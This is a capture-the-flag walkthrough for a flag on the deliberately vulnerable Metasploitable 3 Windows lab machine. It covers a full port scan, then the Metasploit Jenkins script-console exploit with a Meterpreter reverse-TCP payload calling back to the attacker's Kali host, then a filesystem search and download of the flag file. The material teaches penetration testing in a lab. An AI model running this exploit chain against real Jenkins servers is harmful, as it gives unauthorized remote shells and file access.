---
title: King of Diamonds
description: Metasploitable 3 Windows - King of Diamonds
extends: _layouts.documentation
section: content
---

# King of Diamonds

1\. SSH into your kali instance, reference the [quickstart guide](/walkthroughs/metasploitable-3-ubuntu/quickstart) if you need a refresher on how to do this. 
Once logged into you Kali instance, let's run an **nmap** scan.
Replace `138.68.237.0` with the IP address of your metasploitable 3 instance.

```bash
root@ab0c1708a5a0:~# nmap -sV -Pn -T4 -p 1-65535 -vv 138.68.237.0
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-02 17:08 UTC
NSE: Loaded 43 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 17:08
Completed Parallel DNS resolution of 1 host. at 17:08, 0.00s elapsed
Initiating SYN Stealth Scan at 17:08
Scanning 138.68.237.0 [65535 ports]
Discovered open port 3306/tcp on 138.68.237.0
Discovered open port 80/tcp on 138.68.237.0
Discovered open port 21/tcp on 138.68.237.0
Discovered open port 8080/tcp on 138.68.237.0
Discovered open port 139/tcp on 138.68.237.0
Discovered open port 445/tcp on 138.68.237.0
Discovered open port 3389/tcp on 138.68.237.0
Discovered open port 22/tcp on 138.68.237.0
Discovered open port 4848/tcp on 138.68.237.0
Discovered open port 9200/tcp on 138.68.237.0
Discovered open port 8020/tcp on 138.68.237.0
Discovered open port 8282/tcp on 138.68.237.0
Discovered open port 3000/tcp on 138.68.237.0
Discovered open port 8585/tcp on 138.68.237.0
Discovered open port 8022/tcp on 138.68.237.0
Discovered open port 3500/tcp on 138.68.237.0
Discovered open port 8484/tcp on 138.68.237.0
Discovered open port 8181/tcp on 138.68.237.0
Discovered open port 1617/tcp on 138.68.237.0
Discovered open port 8383/tcp on 138.68.237.0
Discovered open port 2222/tcp on 138.68.237.0
Discovered open port 6697/tcp on 138.68.237.0
Discovered open port 5985/tcp on 138.68.237.0
Completed SYN Stealth Scan at 17:08, 1.92s elapsed (65535 total ports)
Initiating Service scan at 17:08
Scanning 23 services on 138.68.237.0
Service scan Timing: About 69.57% done; ETC: 17:12 (0:01:06 remaining)
Completed Service scan at 17:11, 156.11s elapsed (23 services on 1 host)
NSE: Script scanning 138.68.237.0.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 17:11
Completed NSE at 17:11, 24.77s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 17:11
Completed NSE at 17:11, 1.01s elapsed
Nmap scan report for 138.68.237.0
Host is up, received user-set (0.00015s latency).
Scanned at 2019-06-02 17:08:37 UTC for 184s
Not shown: 65512 closed ports
Reason: 65512 resets
PORT     STATE SERVICE           REASON         VERSION
21/tcp   open  ftp               syn-ack ttl 62 Microsoft ftpd
22/tcp   open  ssh               syn-ack ttl 62 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp   open  http              syn-ack ttl 62 Microsoft IIS httpd 7.5
139/tcp  open  netbios-ssn?      syn-ack ttl 62
445/tcp  open  microsoft-ds?     syn-ack ttl 62
1617/tcp open  rmiregistry       syn-ack ttl 62 Java RMI
2222/tcp open  ssh               syn-ack ttl 62 OpenSSH 7.1 (protocol 2.0)
3000/tcp open  ppp?              syn-ack ttl 62
3306/tcp open  mysql?            syn-ack ttl 62
3389/tcp open  ms-wbt-server?    syn-ack ttl 62
3500/tcp open  rtmp-port?        syn-ack ttl 62
4848/tcp open  ssl/appserv-http? syn-ack ttl 62
5985/tcp open  http              syn-ack ttl 62 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
6697/tcp open  ircs-u?           syn-ack ttl 62
8020/tcp open  http              syn-ack ttl 62 Apache httpd
8022/tcp open  http              syn-ack ttl 62 Apache Tomcat/Coyote JSP engine 1.1
8080/tcp open  http              syn-ack ttl 62 Sun GlassFish Open Source Edition  4.0
8181/tcp open  intermapper?      syn-ack ttl 62
8282/tcp open  http              syn-ack ttl 62 Apache Tomcat/Coyote JSP engine 1.1
8383/tcp open  ssl/http          syn-ack ttl 62 Apache httpd
8484/tcp open  http              syn-ack ttl 62 Jetty winstone-2.8
8585/tcp open  http              syn-ack ttl 62 Apache httpd 2.2.21 ((Win64) PHP/5.3.10 DAV/2)
9200/tcp open  http              syn-ack ttl 62 Elasticsearch REST API 1.1.1 (name: Vector; Lucene 4.7)
Service Info: OSs: Windows, Linux; CPE: cpe:/o:microsoft:windows, cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 184.28 seconds
           Raw packets sent: 65535 (2.884MB) | Rcvd: 65535 (2.621MB)


```

2\. Visiting the open http ports through a browser, you'll see that http://138.68.237.0:8484 has a Jenkins CI application installed.

<img src="/assets/images/walkthroughs/metasploitable-3-windows/king-of-diamonds/1-port-8484.PNG">

3\. Start up metasploit.

```bash
root@9984d31ca3c1:~# msfconsole

# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *


       =[ metasploit v4.16.58-dev                         ]
+ -- --=[ 1769 exploits - 1007 auxiliary - 307 post       ]
+ -- --=[ 537 payloads - 41 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf >
```

4\. Use a jenkins exploit.
```bash
msf5 > use exploit/multi/http/jenkins_script_console
msf5 exploit(multi/http/jenkins_script_console) > show options

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   API_TOKEN                   no        The API token for the specified username
   PASSWORD                    no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /jenkins/        yes       The path to the Jenkins-CI application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Windows
```

5\. Set RHOST and RPORT options which are both required.
```bash
msf5 exploit(multi/http/jenkins_script_console) > set RHOST 138.68.237.0
RHOST => 138.68.237.0
msf5 exploit(multi/http/jenkins_script_console) > set RPORT 8484
RPORT => 8484
msf5 exploit(multi/http/jenkins_script_console) > show options

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   API_TOKEN                   no        The API token for the specified username
   PASSWORD                    no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     138.68.237.0     yes       The target address range or CIDR identifier
   RPORT      8484             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /jenkins/        yes       The path to the Jenkins-CI application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Windows
```

6\. Browse compatible payloads.
```bash
msf5 exploit(multi/http/jenkins_script_console) > show payloads

Compatible Payloads
===================

   #    Name                                                Disclosure Date  Rank    Check  Description
   -    ----                                                ---------------  ----    -----  -----------
   1    generic/custom                                                       normal  No     Custom Payload
   2    generic/debug_trap                                                   normal  No     Generic x86 Debug Trap
   3    generic/shell_bind_tcp                                               normal  No     Generic Command Shell, Bind TCP Inline
   ... more payloads ...
   52   windows/meterpreter/reverse_tcp                                      normal  No     Windows Meterpreter (Reflective Injection), Reverse TCP Stager
   ... even more payloads
```

7\. Use meterpreter payload whenever possible
```
msf5 exploit(multi/http/jenkins_script_console) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/http/jenkins_script_console) > show options

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   API_TOKEN                   no        The API token for the specified username
   PASSWORD                    no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     138.68.237.0     yes       The target address range or CIDR identifier
   RPORT      8484             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /jenkins/        yes       The path to the Jenkins-CI application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows
```

8\. Set required TARGETURI, LHOST and LPORT properties.
Replace `142.93.88.141` with the IP address of your Kali instance.
```bash
msf5 exploit(multi/http/jenkins_script_console) > set LPORT 9990
LPORT => 9990
msf5 exploit(multi/http/jenkins_script_console) > set LHOST 142.93.88.141
LHOST => 142.93.88.141
msf5 exploit(multi/http/jenkins_script_console) > set TARGETURI /
TARGETURI => /
msf5 exploit(multi/http/jenkins_script_console) > show options

Module options (exploit/multi/http/jenkins_script_console):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   API_TOKEN                   no        The API token for the specified username
   PASSWORD                    no        The password for the specified username
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     138.68.237.0     yes       The target address range or CIDR identifier
   RPORT      8484             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /                yes       The path to the Jenkins-CI application
   URIPATH                     no        The URI to use for this exploit (default is random)
   USERNAME                    no        The username to authenticate as
   VHOST                       no        HTTP server virtual host


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     142.93.88.141    yes       The listen address (an interface may be specified)
   LPORT     9990             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows
```

9\. Run the exploit. 
```bash
msf5 exploit(multi/http/jenkins_script_console) > exploit

[-] Handler failed to bind to 142.93.88.141:9990:-  -
[*] Started reverse TCP handler on 0.0.0.0:9990
[*] Checking access to the script console
[*] No authentication required, skipping login...
[*] 138.68.237.0:8484 - Sending command stager...
[*] Command Stager progress -   2.06% done (2048/99626 bytes)
[*] Command Stager progress -   4.11% done (4096/99626 bytes)
[*] Command Stager progress -   6.17% done (6144/99626 bytes)
[*] Command Stager progress -   8.22% done (8192/99626 bytes)

...more progress logging...

[*] Command Stager progress - 100.00% done (99626/99626 bytes)

meterpreter >
```

10\. Search for flags.
```bash
meterpreter > cd ..
meterpreter > cd ..
meterpreter > pwd
C:\
meterpreter > search -f *_of_* ./
Found 61 results...
    c:\jack_of_diamonds.png
    c:\inetpub\wwwroot\seven_of_hearts.html (2439511 bytes)
    c:\inetpub\wwwroot\six_of_diamonds.zip (384916 bytes)
    
    ...more search results...
    
    c:\wamp\www\wordpress\wp-content\uploads\2016\09\king_of_damonds-150x150.png (46738 bytes)
    c:\wamp\www\wordpress\wp-content\uploads\2016\09\king_of_damonds-214x300.png (130832 bytes)
    c:\wamp\www\wordpress\wp-content\uploads\2016\09\king_of_damonds.png (585695 bytes)
    c:\Windows\three_of_spades.png (519696 bytes)
    c:\Windows\winsxs\FileMaps\$$_resources_ease_of_access_themes_e29108c7f81ea04c.cdf-ms (1028 bytes)
```

11\. Download the king_of_damonds.png file.
```bash
meterpreter > download ./wamp/www/wordpress/wp-content/uploads/2016/09/king_of_damonds.png
[*] Downloading: ./wamp/www/wordpress/wp-content/uploads/2016/09/king_of_damonds.png -> king_of_damonds.png
[*] Downloaded 571.97 KiB of 571.97 KiB (100.0%): ./wamp/www/wordpress/wp-content/uploads/2016/09/king_of_damonds.png -> king_of_damonds.png
[*] download   : ./wamp/www/wordpress/wp-content/uploads/2016/09/king_of_damonds.png -> king_of_damonds.png
```

12\. SCP the file to your local computer.
Replace `142.93.88.141` with the IP address of your Kali instance.
```bash
$ scp -i ../hacker-lab hacker-lab@142.93.88.141:/home/hacker-lab/king_of_damonds.png ./
Enter passphrase for key '../hacker-lab':
king_of_damonds.png
```

13\. Flag!

<img src="/assets/images/walkthroughs/metasploitable-3-windows/king-of-diamonds/king_of_damonds.PNG">